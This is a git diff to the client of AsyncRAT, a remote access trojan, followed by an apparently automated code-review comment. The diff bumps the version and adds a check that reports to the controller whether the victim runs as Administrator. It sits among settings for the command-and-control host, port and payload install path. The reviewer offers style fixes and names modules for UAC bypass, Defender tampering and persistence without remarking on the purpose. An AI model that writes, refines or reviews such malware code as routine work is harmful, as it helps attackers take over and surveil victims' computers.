diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index f9722c6..6cdf390 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -9,7 +9,7 @@ namespace Client { public static string Ports = "6606"; public static string Host = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.6"; + public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Password = "NYAN CAT"; diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index a06ca35..582d9f5 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -8,6 +8,7 @@ using System.IO; using System.Net.Sockets; using System.Threading; using System.Text; +using System.Security.Principal; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -80,6 +81,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes();
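Review bot: In ClientSocket.cs the `Admin` value is built with `.ToString().ToLower().Replace("true", "Administrator").Replace("false","User")`, which hides a two-way choice behind culture-sensitive string rewriting; `IsInRole(WindowsBuiltInRole.Administrator) ? "Administrator" : "User"` says the same thing directly. The literal `"Administrator"` is also what Form1.cs compares the PRIVILEGES column against, so a comment such as `// Must match the string checked in Form1.cs` would document the coupling. The same `new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(...)` expression is repeated in HandleUAC.cs, HandleUninstall.cs, HandleWindowsDefender.cs and NormalStartup.cs and would read better as one shared helper. The enclosing method starts outside the hunk.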